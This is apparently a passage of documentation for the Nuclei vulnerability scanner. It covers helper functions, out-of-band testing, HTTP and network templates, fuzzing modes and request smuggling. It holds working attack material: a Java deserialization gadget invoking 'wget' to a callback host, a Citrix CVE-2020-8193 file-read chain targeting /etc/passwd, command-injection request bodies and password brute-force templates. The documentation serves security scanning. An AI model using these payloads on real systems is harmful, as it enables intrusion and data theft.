date_time(\"%Y-%M-%D %H:%m\", 1654870680)
date_time(\"2006-01-02 15:04\", unix_time()) 2022-06-10 14:18
+dec_to_hex(number number | string) string Transforms the input number into hexadecimal format dec_to_hex(7001)\" 1b59
+ends_with(str string, suffix …string) bool Checks if the string ends with any of the provided substrings ends_with(\"Hello\", \"lo\") true
+generate_java_gadget(gadget, cmd, encoding interface) string Generates a Java Deserialization Gadget generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64\") rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0ACpjYWhnMmZiaW41NjRvMGJ0MHRzMDhycDdlZXBwYjkxNDUub2FzdC5mdW54
+generate_jwt(json, algorithm, signature, unixMaxAge) []byte Generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm generate_jwt(\"{\\"name\\":\\"John Doe\\",\\"foo\\":\\"bar\\"}\", \"HS256\", \"hello-world\") eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U
+gzip(input string) string Compresses the input using GZip base64(gzip(\"Hello\")) +H4sIAAAAAAAA//JIzcnJBwQAAP//gonR9wUAAAA=
+gzip_decode(input string) string Decompresses the input using GZip gzip_decode(hex_decode(\"1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000\")) Hello
+hex_decode(input interface) []byte Hex decodes the given input hex_decode(\"6161\") aa
+hex_encode(input interface) string Hex encodes the given input hex_encode(\"aa\") 6161
+hex_to_dec(hexNumber number | string) float64 Transforms the input hexadecimal number into decimal format hex_to_dec(\"ff\")
hex_to_dec(\"0xff\") 255
+hmac(algorithm, data, secret) string hmac function that accepts a hashing function type with data and secret hmac(\"sha1\", \"test\", \"scrt\") 8856b111056d946d5c6c92a21b43c233596623c6
+html_escape(input interface) string HTML escapes the given input html_escape(\"\test\\") <body>test</body>
+html_unescape(input interface) string HTML un-escapes the given input html_unescape(\"<body>test</body>\") \test\
+join(separator string, elements …interface) string Joins the given elements using the specified separator join(\"_\", 123, \"hello\", \"world\") 123_hello_world
+json_minify(json) string Minifies a JSON string by removing unnecessary whitespace json_minify(\"{ \\"name\\": \\"John Doe\\", \\"foo\\": \\"bar\\" }\") {\"foo\":\"bar\",\"name\":\"John Doe\"}
+json_prettify(json) string Prettifies a JSON string by adding indentation json_prettify(\"{\\"foo\\":\\"bar\\",\\"name\\":\\"John Doe\\"}\") {
+ \\"foo\\": \\"bar\\",
+ \\"name\\": \\"John Doe\\"
+len(arg interface) int Returns the length of the input len(\"Hello\") 5
+line_ends_with(str string, suffix …string) bool Checks if any line of the string ends with any of the provided substrings line_ends_with(\"Hello
+Hi\", \"lo\") true
+line_starts_with(str string, prefix …string) bool Checks if any line of the string starts with any of the provided substrings line_starts_with(\"Hi
+Hello\", \"He\") true
+md5(input interface) string Calculates the MD5 (Message Digest) hash of the input md5(\"Hello\") 8b1a9953c4611296a827abf8c47804d7
+mmh3(input interface) string Calculates the MMH3 (MurmurHash3) hash of an input mmh3(\"Hello\") 316307400
+oct_to_dec(octalNumber number | string) float64 Transforms the input octal number into a decimal format oct_to_dec(\"0o1234567\")
oct_to_dec(1234567) 342391
+print_debug(args …interface) Prints the value of a given input or expression. Used for debugging. print_debug(1+2, \"Hello\") 3 Hello
+rand_base(length uint, optionalCharSet string) string Generates a random sequence of given length string from an optional charset (defaults to letters and numbers) rand_base(5, \"abc\") caccb
+rand_char(optionalCharSet string) string Generates a random character from an optional character set (defaults to letters and numbers) rand_char(\"abc\") a
+rand_int(optionalMin, optionalMax uint) int Generates a random integer between the given optional limits (defaults to 0 - MaxInt32) rand_int(1, 10) 6
+rand_text_alpha(length uint, optionalBadChars string) string Generates a random string of letters, of given length, excluding the optional cutset characters rand_text_alpha(10, \"abc\") WKozhjJWlJ
+rand_text_alphanumeric(length uint, optionalBadChars string) string Generates a random alphanumeric string, of given length without the optional cutset characters rand_text_alphanumeric(10, \"ab12\") NthI0IiY8r
+rand_ip(cidr …string) string Generates a random IP address rand_ip(\"\")
+rand_text_numeric(length uint, optionalBadNumbers string) string Generates a random numeric string of given length without the optional set of undesired numbers rand_text_numeric(10, 123) 0654087985
+regex(pattern, input string) bool Tests the given regular expression against the input string regex(\"H([a-z]+)o\", \"Hello\") true
+remove_bad_chars(input, cutset interface) string Removes the desired characters from the input remove_bad_chars(\"abcd\", \"bc\") ad
+repeat(str string, count uint) string Repeats the input string the given amount of times repeat(\"../\", 5) ../../../../../
+replace(str, old, new string) string Replaces a given substring in the given input replace(\"Hello\", \"He\", \"Ha\") Hallo
+replace_regex(source, regex, replacement string) string Replaces substrings matching the given regular expression in the input replace_regex(\"He123llo\", \"(\\d+)\", \"\") Hello
+reverse(input string) string Reverses the given input reverse(\"abc\") cba
+sha1(input interface) string Calculates the SHA1 (Secure Hash 1) hash of the input sha1(\"Hello\") f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0
+sha256(input interface) string Calculates the SHA256 (Secure Hash 256) hash of the input sha256(\"Hello\") 185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969
+starts_with(str string, prefix …string) bool Checks if the string starts with any of the provided substrings starts_with(\"Hello\", \"He\") true
+to_lower(input string) string Transforms the input into lowercase characters to_lower(\"HELLO\") hello
+to_unix_time(input string, layout string) int Parses a string date time using default or user given layouts, then returns its Unix timestamp to_unix_time(\"2022-01-13T16:30:10+00:00\")
to_unix_time(\"2022-01-13 16:30:10\")
to_unix_time(\"13-01-2022 16:30:10\". \"02-01-2006 15:04:05\") 1642091410
+to_upper(input string) string Transforms the input into uppercase characters to_upper(\"hello\") HELLO
+trim(input, cutset string) string Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed trim(\"aaaHelloddd\", \"ad\") Hello
+trim_left(input, cutset string) string Returns a slice of the input with all leading Unicode code points contained in cutset removed trim_left(\"aaaHelloddd\", \"ad\") Helloddd
+trim_prefix(input, prefix string) string Returns the input without the provided leading prefix string trim_prefix(\"aaHelloaa\", \"aa\") Helloaa
+trim_right(input, cutset string) string Returns a string, with all trailing Unicode code points contained in cutset removed trim_right(\"aaaHelloddd\", \"ad\") aaaHello
+trim_space(input string) string Returns a string, with all leading and trailing white space removed, as defined by Unicode trim_space(\" Hello \") \"Hello\"
+trim_suffix(input, suffix string) string Returns input without the provided trailing suffix string trim_suffix(\"aaHelloaa\", \"aa\") aaHello
+unix_time(optionalSeconds uint) float64 Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds unix_time(10) 1639568278
+url_decode(input string) string URL decodes the input string url_decode(\"\")
+url_encode(input string) string URL encodes the input string url_encode(\"\")
+wait_for(seconds uint) Pauses the execution for the given amount of seconds wait_for(10) true
+zlib(input string) string Compresses the input using Zlib base64(zlib(\"Hello\")) eJzySM3JyQcEAAD//wWMAfU=
+zlib_decode(input string) string Decompresses the input using Zlib zlib_decode(hex_decode(\"789cf248cdc9c907040000ffff058c01f5\")) Hello
+resolve(host string, format string) string Resolves a host using a dns type that you define resolve(\"localhost\",4)
+ip_format(ip string, format string) string It takes an input ip and converts it to another format according to this legend, the second parameter indicates the conversion index and must be between 1 and 11 ip_format(\"\", 3) 0177.0.0.01
+Deserialization helper functions
+Nuclei allows payload generation for a few common gadget from ysoserial.
+Supported Payload:
+dns (URLDNS)
+Supported encodings:
+base64 (default)
+Deserialization helper function format:
+{{generate_java_gadget(payload, cmd, encoding }}
+Deserialization helper function example:
+{{generate_java_gadget(\"commons-collections3.1\", \"wget http://{{interactsh-url}}\", \"base64\")}}
+JSON helper functions
+Nuclei allows manipulate JSON strings in different ways, here is a list of its functions:
+generate_jwt, to generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
+json_minify, to minifies a JSON string by removing unnecessary whitespace.
+json_prettify, to prettifies a JSON string by adding indentation.
+To generate a JSON Web Token (JWT), you have to supply the JSON that you want to sign, at least.
+Here is a list of supported algorithms for generating JWTs with generate_jwt function (case-insensitive):
+Empty string (\"\") also means NONE.
+{{generate_jwt(json, algorithm, signature, maxAgeUnix)}}
+Arguments other than json are optional.
+ json: | # required
+ {
+ \"foo\": \"bar\",
+ \"name\": \"John Doe\"
+ }
+ alg: \"HS256\" # optional
+ sig: \"this_is_secret\" # optional
+ age: \'{{to_unix_time(\"2032-12-30T16:30:10+00:00\")}}\' # optional
+ jwt: \'{{generate_jwt(json, \"{{alg}}\", \"{{sig}}\", \"{{age}}\")}}\'
+The maxAgeUnix argument is to set the expiration \"exp\" JWT standard claim, as well as the \"iat\" claim when you call the function.
+ json: |
+ {
+ \"foo\": \"bar\",
+ \"name\": \"John Doe\"
+ }
+ minify: \"{{json_minify(json}}\"
+minify variable output:
+{ \"foo\": \"bar\", \"name\": \"John Doe\" }
+ json: \'{\"foo\":\"bar\",\"name\":\"John Doe\"}\'
+ pretty: \"{{json_prettify(json}}\"
+pretty variable output:
+ \"foo\": \"bar\",
+ \"name\": \"John Doe\"
+{{ resolve(host, format) }}
+Here is a list of formats available for dns type:
+4 or a
+6 or aaaa
+# Preprocessors
+Review details on pre-processors for Nuclei
+Certain pre-processors can be specified globally anywhere in the template that run as soon as the template is loaded to achieve things like random ids generated for each template run.
+Generates a random ID for a template on each nuclei run. This can be used anywhere in the template and will always contain the same value. randstr can be suffixed by a number, and new random ids will be created for those names too. Ex. {{randstr_1}} which will remain same across the template.
+randstr is also supported within matchers and can be used to match the inputs.
+For example:
+ - method: POST
+ path:
+ - \"{{BaseURL}}/level1/application/\"
+ headers:
+ cmd: echo \'{{randstr}}\'
+ matchers:
+ - type: word
+ words:
+ - \'{{randstr}}\'
+OOB Testing
+Understanding OOB testing with Nuclei Templates
+Since release of Nuclei v2.3.6, Nuclei supports using the interactsh API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It’s as easy as writing {{interactsh-url}} anywhere in the request, and adding a matcher for interact_protocol. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
+Interactsh Placeholder
+{{interactsh-url}} placeholder is supported in http and network requests.
+An example of nuclei request with {{interactsh-url}} placeholders is provided below. These are replaced on runtime with unique interactsh URLs.
+ - raw:
+ - |
+ GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+Interactsh Matchers
+Interactsh interactions can be used with word, regex or dsl matcher/extractor using following parts.
+Value can be dns, http or smtp. This is the standard matcher for every interactsh based template with DNS often as the common value as it is very non-intrusive in nature.
+The request that the interactsh server received.
+The response that the interactsh server sent to the client.
+# Example of Interactsh DNS Interaction matcher:
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - \"dns\"
+Example of HTTP Interaction matcher + word matcher on Interaction content
+matchers-condition: and
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - \"http\"
+ - type: regex
+ part: interactsh_request # Confirms the retrieval of /etc/passwd file
+ regex:
+ - \"root:[x*]:0:0:\"
+## Protocols :
+# HTTP Protocol :
+### Basic HTTP
+Nuclei offers extensive support for various features related to HTTP protocol. Raw and Model based HTTP requests are supported, along with options Non-RFC client requests support too. Payloads can also be specified and raw requests can be transformed based on payload values along with many more capabilities that are shown later on this Page.
+HTTP Requests start with a request block which specifies the start of the requests for the template.
+# Start the requests for the template right here
+Request method can be GET, POST, PUT, DELETE, etc. depending on the needs.
+# Method is the method for the request
+method: GET
+### Redirects
+Redirection conditions can be specified per each template. By default, redirects are not followed. However, if desired, they can be enabled with redirects: true in request details. 10 redirects are followed at maximum by default which should be good enough for most use cases. More fine grained control can be exercised over number of redirects followed by using max-redirects field.
+An example of the usage:
+ - method: GET
+ path:
+ - \"{{BaseURL}}/login.php\"
+ redirects: true
+ max-redirects: 3
+### Path
+The next part of the requests is the path of the request path. Dynamic variables can be placed in the path to modify its behavior on runtime.
+Variables start with {{ and end with }} and are case-sensitive.
+{{BaseURL}} - This will replace on runtime in the request by the input URL as specified in the target file.
+{{RootURL}} - This will replace on runtime in the request by the root URL as specified in the target file.
+{{Hostname}} - Hostname variable is replaced by the hostname including port of the target on runtime.
+{{Host}} - This will replace on runtime in the request by the input host as specified in the target file.
+{{Port}} - This will replace on runtime in the request by the input port as specified in the target file.
+{{Path}} - This will replace on runtime in the request by the input path as specified in the target file.
+{{File}} - This will replace on runtime in the request by the input filename as specified in the target file.
+{{Scheme}} - This will replace on runtime in the request by protocol scheme as specified in the target file.
+An example is provided below -
+Variable Value
+{{Port}} 443
+{{Path}} /foo
+{{File}} bar.php
+{{Scheme}} https
+Some sample dynamic variable replacement examples:
+path: \"{{BaseURL}}/.git/config\"
+# This path will be replaced on execution with BaseURL
+# If BaseURL is set to then the
+# path will get replaced to the following:
+Multiple paths can also be specified in one request which will be requested for the target.
+### Headers
+Headers can also be specified to be sent along with the requests. Headers are placed in form of key/value pairs. An example header configuration looks like this:
+# headers contain the headers for the request
+ # Custom user-agent header
+ User-Agent: Some-Random-User-Agent
+ # Custom request origin
+ Origin:
+### Body
+Body specifies a body to be sent along with the request. For instance:
+# Body is a string sent along with the request
+body: \"admin=test\"
+To maintain a cookie-based browser-like session between multiple requests, cookies are reused by default. This is beneficial when you want to maintain a session between a series of requests to complete the exploit chain or to perform authenticated scans. If you need to disable this behavior, you can use the disable-cookie field.
+# disable-cookie accepts boolean input and false as default
+disable-cookie: true
+### Request Condition
+Request condition allows checking for the condition between multiple requests for writing complex checks and exploits involving various HTTP requests to complete the exploit chain.
+The functionality will be automatically enabled if DSL matchers/extractors contain numbers as a suffix with respective attributes.
+For example, the attribute status_code will point to the effective status code of the current request/response pair in elaboration. Previous responses status codes are accessible by suffixing the attribute name with _n, where n is the n-th ordered request 1-based. So if the template has four requests and we are currently at number 3:
+status_code: will refer to the response code of request number 3
+status_code_1 and status_code_2 will refer to the response codes of the sequential responses number one and two
+For example with status_code_1, status_code_3, andbody_2:
+ matchers:
+ - type: dsl
+ dsl:
+ - \"status_code_1 == 404 && status_code_2 == 200 && contains((body_2), \'secret_string\')\"
+Request conditions might require more memory as all attributes of previous responses are kept in memory
+Example HTTP Template
+The final template file for the .git/config file mentioned above is as follows:
+id: git-config
+ name: Git Config File
+ author: Ice3man
+ severity: medium
+ description: Searches for the pattern /.git/config on passed URLs.
+ - method: GET
+ path:
+ - \"{{BaseURL}}/.git/config\"
+ matchers:
+ - type: word
+ words:
+ - \"[core]\"
+### Raw HTTP
+Another way to create request is using raw requests which comes with more flexibility and support of DSL helper functions, like the following ones (as of now it’s suggested to leave the Host header as in the example with the variable {{Hostname}}), All the Matcher, Extractor capabilities can be used with RAW requests in same the way described above.
+ - raw:
+ - |
+ POST /path2/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ a=test&b=pd
+Requests can be fine-tuned to perform the exact tasks as desired. Nuclei requests are fully configurable meaning you can configure and define each and every single thing about the requests that will be sent to the target servers.
+RAW request format also supports various helper functions letting us do run time manipulation with input. An example of the using a helper function in the header.
+ - raw:
+ - |
+ GET /manager/html HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(\'username:password\')}}
+To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as specified below which will make the request to user specified input.
+ - raw:
+ - |
+ GET HTTP/1.1
+ Host: {{Hostname}}
+# HTTP Payloads
+Nuclei engine supports payloads module that allow to run various type of payloads in multiple format, It’s possible to define placeholders with simple keywords (or using brackets {{helper_function(variable)}} in case mutator functions are needed), and perform batteringram, pitchfork and clusterbomb attacks. The wordlist for these attacks needs to be defined during the request definition under the Payload field, with a name matching the keyword, Nuclei supports both file based and in template wordlist support and Finally all DSL functionalities are fully available and supported, and can be used to manipulate the final values.
+Payloads are defined using variable name and can be referenced in the request in between {{ }} marker.
+An example of the using payloads with local wordlist:
+# HTTP Intruder fuzzing using local wordlist.
+ paths: params.txt
+ header: local.txt
+An example of the using payloads with in template wordlist support:
+# HTTP Intruder fuzzing using in template wordlist.
+ password:
+ - admin
+ - guest
+ - password
+Note: be careful while selecting attack type, as unexpected input will break the template.
+For example, if you used clusterbomb or pitchfork as attack type and defined only one variable in the payload section, template will fail to compile, as clusterbomb or pitchfork expect more than one variable to use in the template.
+### Attack modes:
+Nuclei engine supports multiple attack types, including batteringram as default type which generally used to fuzz single parameter, clusterbomb and pitchfork for fuzzing multiple parameters which works same as classical burp intruder.
+Type batteringram pitchfork clusterbomb
+Support ✔ ✔ ✔
+The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
+The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
+It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
+The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations.
+It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
+This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
+Attack Mode Example
+An example of the using clusterbomb attack to fuzz.
+ - raw:
+ - |
+ POST /?file={{path}} HTTP/1.1
+ User-Agent: {{header}}
+ Host: {{Hostname}}
+ attack: clusterbomb # Defining HTTP fuzz attack type
+ payloads:
+ path: helpers/wordlists/prams.txt
+ header: helpers/wordlists/header.txt
+# HTTP Payloads Examples
+Review some HTTP payload examples for Nuclei
+### HTTP Intruder fuzzing
+This template makes a defined POST request in RAW format along with in template defined payloads running clusterbomb intruder and checking for string match against response.
+id: multiple-raw-example
+ name: Test RAW Template
+ author: princechaddha
+ severity: info
+# HTTP Intruder fuzzing with in template payload support.
+ - raw:
+ - |
+ POST /?username=§username§¶mb=§password§ HTTP/1.1
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
+ Host: {{Hostname}}
+ another_header: {{base64(\'§password§\')}}
+ Accept: */*
+ body=test
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ - guest
+ - password
+ - test
+ - 12345
+ - 123456
+ attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb
+ matchers:
+ - type: word
+ words:
+ - \"Test is test matcher text\"
+### Fuzzing multiple requests
+This template makes a defined POST request in RAW format along with wordlist based payloads running clusterbomb intruder and checking for string match against response.
+id: multiple-raw-example
+ name: Test RAW Template
+ author: princechaddha
+ severity: info
+ - raw:
+ - |
+ POST /?param_a=§param_a§¶mb=§param_b§ HTTP/1.1
+ User-Agent: §param_a§
+ Host: {{Hostname}}
+ another_header: {{base64(\'§param_b§\')}}
+ Accept: */*
+ admin=test
+ - |
+ User-Agent: nuclei
+ Host: {{Hostname}}
+ {{sha256(\'§param_a§\')}}
+ - |
+ PUT / HTTP/1.1
+ Host: {{Hostname}}
+ {{html_escape(\'§param_a§\')}} + {{hex_encode(\'§param_b§\'))}}
+ attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb
+ payloads:
+ param_a: payloads/prams.txt
+ param_b: payloads/paths.txt
+ matchers:
+ - type: word
+ words:
+ - \"Test is test matcher text\"
+### Authenticated fuzzing
+This template makes a subsequent HTTP requests with defined requests maintaining sessions between each request and checking for string match against response.
+id: multiple-raw-example
+ name: Test RAW Template
+ author: princechaddha
+ severity: info
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ - |
+ POST /testing HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ testing=parameter
+ cookie-reuse: true # Cookie-reuse maintain the session between all request like browser.
+ matchers:
+ - type: word
+ words:
+ - \"Test is test matcher text\"
+Dynamic variable support
+This template makes a subsequent HTTP requests maintaining sessions between each request, dynamically extracting data from one request and reusing them into another request using variable name and checking for string match against response.
+id: CVE-2020-8193
+ name: Citrix unauthenticated LFI
+ author: princechaddha
+ severity: high
+ reference:
+ - raw:
+ - |
+ POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Content-Type: application/xml
+ X-NITRO-USER: xpyZxwy6
+ - |
+ GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.24.0
+ Accept: */*
+ Connection: close
+ - |
+ GET /menu/neo HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.24.0
+ Accept: */*
+ Connection: close
+ - |
+ GET /menu/stc HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.24.0
+ Accept: */*
+ Connection: close
+ - |
+ POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.24.0
+ Accept: */*
+ Connection: close
+ Content-Type: application/xml
+ rand_key: §randkey§
+ - |
+ POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.24.0
+ Accept: */*
+ Connection: close
+ Content-Type: application/xml
+ rand_key: §randkey§
+ cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser.
+ extractors:
+ - type: regex
+ name: randkey # Variable name
+ part: body
+ internal: true
+ regex:
+ - \"(?m)[0-9]{3,10}\\.[0-9]+\"
+ matchers:
+ - type: regex
+ regex:
+ - \"root:[x*]:0:0:\"
+ part: body
+# Advanced HTTP
+### Unsafe HTTP
+Learn about using rawhttp or unsafe HTTP with Nuclei
+Nuclei supports rawhttp for complete request control and customization allowing any kind of malformed requests for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
+rawhttp library is disabled by default and can be enabled by including unsafe: true in the request block.
+Here is an example of HTTP request smuggling detection template using rawhttp.
+ - raw:
+ - |+
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 150
+ Transfer-Encoding: chunked
+ 0
+ GET /post?postId=5 HTTP/1.1
+ User-Agent: a\"/>
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 5
+ x=1
+ - |+
+ GET /post?postId=5 HTTP/1.1
+ Host: {{Hostname}}
+ unsafe: true # Enables rawhttp client
+ matchers:
+ - type: dsl
+ dsl:
+ - \'contains(body, \"\")\'
+### Connection Tampering
+Learn more about using HTTP pipelining and connection pooling with Nuclei
+HTTP Pipelining support has been added which allows multiple HTTP requests to be sent on the same connection inspired from http-desync-attacks-request-smuggling-reborn.
+Before running HTTP pipelining based templates, make sure the running target supports HTTP Pipeline connection, otherwise nuclei engine fallbacks to standard HTTP request engine.
+If you want to confirm the given domain or list of subdomains supports HTTP Pipelining, httpx has a flag -pipeline to do so.
+An example configuring showing pipelining attributes of nuclei.
+ unsafe: true
+ pipeline: true
+ pipeline-concurrent-connections: 40
+ pipeline-requests-per-connection: 25000
+An example template demonstrating pipelining capabilities of nuclei has been provided below:
+id: pipeline-testing
+ name: pipeline testing
+ author: princechaddha
+ severity: info
+ - raw:
+ - |+
+ GET /{{path}} HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}
+ attack: batteringram
+ payloads:
+ path: path_wordlist.txt
+ unsafe: true
+ pipeline: true
+ pipeline-concurrent-connections: 40
+ pipeline-requests-per-connection: 25000
+ matchers:
+ - type: status
+ part: header
+ status:
+ - 200
+### Connection pooling
+While the earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on requirement.
+To enable connection pooling in the template, threads attribute can be defined with respective number of threads you wanted to use in the payloads sections.
+Connection: Close header can not be used in HTTP connection pooling template, otherwise engine will fail and fallback to standard HTTP requests with pooling.
+An example template using HTTP connection pooling:
+id: fuzzing-example
+ name: Connection pooling example
+ author: princechaddha
+ severity: info
+ - raw:
+ - |
+ GET /protected HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(\'admin:§password§\')}}
+ attack: batteringram
+ payloads:
+ password: password.txt
+ threads: 40
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - \"Unique string\"
+ part: body
+## Request Tampering
+Learn about request tampering in HTTP with Nuclei
+### Requests Annotation
+Request inline annotations allow performing per request properties/behavior override. They are very similar to python/java class annotations and must be put on the request just before the RFC line. Currently, only the following overrides are supported:
+@Host: which overrides the real target of the request (usually the host/ip provided as input). It supports syntax with ip/domain, port, and scheme, for example: domain.tld, domain.tld:port, http://domain.tld:port
+@tls-sni: which overrides the SNI Name of the TLS request (usually the hostname provided as input). It supports any literals. The special value uses the Host header and interactsh-url uses an interactsh generated URL.
+@timeout: which overrides the timeout for the request to a custom duration. It supports durations formatted as string. If no duration is specified, the default Timeout flag value is used.
+The following example shows the annotations within a request:
+- |
+ @Host:
+ POST / HTTP/1.1
+ Pragma: no-cache
+ Host: {{Hostname}}
+ Cache-Control: no-cache, no-transform
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
+This is particularly useful, for example, in the case of templates with multiple requests, where one request after the initial one needs to be performed to a specific host (for example, to check an API validity):
+ - raw:
+ # this request will be sent to {{Hostname}} to get the token
+ - |
+ GET /getkey HTTP/1.1
+ Host: {{Hostname}}
+ # This request will be sent instead to to verify the token validity
+ - |
+ @Host:
+ GET /api/key={{token}} HTTP/1.1
+ Host:
+ extractors:
+ - type: regex
+ name: token
+ part: body
+ regex:
+ # random extractor of strings between prefix and suffix
+ - \'prefix(.*)suffix\'
+ matchers:
+ - type: word
+ part: body
+ words:
+ - valid token
+Example of custom timeout annotations:
+- |
+ @timeout: 25s
+ POST /conf_mail.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
+Example of sni annotation with interactsh-url:
+- |
+ @tls-sni: interactsh-url
+ POST /conf_mail.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
+# Network Protocol
+Learn about network requests with Nuclei
+Nuclei can act as an automatable Netcat, allowing users to send bytes across the wire and receive them, while providing matching and extracting capabilities on the response.
+Network Requests start with a network block which specifies the start of the requests for the template.
+# Start the requests for the template right here
+First thing in the request is inputs. Inputs are the data that will be sent to the server, and optionally any data to read from the server.
+At its most simple, just specify a string, and it will be sent across the network socket.
+# inputs is the list of inputs to send to the server
+ - data: \"TEST\r
+You can also send hex encoded text that will be first decoded and the raw bytes will be sent to the server.
+ - data: \"50494e47\"
+ type: hex
+ - data: \"\r
+Helper function expressions can also be defined in input and will be first evaluated and then sent to the server. The last Hex Encoded example can be sent with helper functions this way:
+ - data: \'hex_decode(\"50494e47\")\r
+One last thing that can be done with inputs is reading data from the socket. Specifying read-size with a non-zero value will do the trick. You can also assign the read data some name, so matching can be done on that part.
+ - read-size: 8
+Example with reading a number of bytes, and only matching on them.
+ - read-size: 8
+ name: prefix
+ - type: word
+ part: prefix
+ words:
+ - \"CAFEBABE\"
+Multiple steps can be chained together in sequence to do network reading / writing.
+The next part of the requests is the host to connect to. Dynamic variables can be placed in the path to modify its value on runtime. Variables start with {{ and end with }} and are case-sensitive.
+Hostname - variable is replaced by the hostname provided on command line.
+An example name value:
+ - \"{{Hostname}}\"
+Nuclei can also do TLS connection to the target server. Just add tls:// as prefix before the Hostname and you’re good to go.
+ - \"tls://{{Hostname}}\"
+If a port is specified in the host, the user supplied port is ignored and the template port takes precedence.
+Starting from Nuclei v2.9.15, a new field called port has been introduced in network templates. This field allows users to specify the port separately instead of including it in the host field.
+Previously, if you wanted to write a network template for an exploit targeting SSH, you would have to specify both the hostname and the port in the host field, like this:
+ - \"{{Hostname}}\"
+ - \"{{Host}}:22\"
+In the above example, two network requests are sent: one to the port specified in the input/target, and another to the default SSH port (22).
+The reason behind introducing the port field is to provide users with more flexibility when running network templates on both default and non-default ports. For example, if a user knows that the SSH service is running on a non-default port of 2222 (after performing a port scan with service discovery), they can simply run:
+$ nuclei -u -id xyz-ssh-exploit
+In this case, Nuclei will use port 2222 instead of the default port 22. If the user doesn’t specify any port in the input, port 22 will be used by default. However, this approach may not be straightforward to understand and can generate warnings in logs since one request is expected to fail.
+Another issue with the previous design of writing network templates is that requests can be sent to unexpected ports. For example, if a web service is running on port 8443 and the user runs:
+$ nuclei -u
+In this case, xyz-ssh-exploit template will send one request to and another request to, which may return unexpected responses and eventually result in errors. This is particularly problematic in automation scenarios.
+To address these issues while maintaining the existing functionality, network templates can now be written in the following way:
+ - \"{{Hostname}}\"
+port: 22
+In this new design, the functionality to run templates on non-standard ports will still exist, except for the default reserved ports (80, 443, 8080, 8443, 8081, 53). Additionally, the list of default reserved ports can be customized by adding a new field called exclude-ports:
+exclude-ports: 80,443
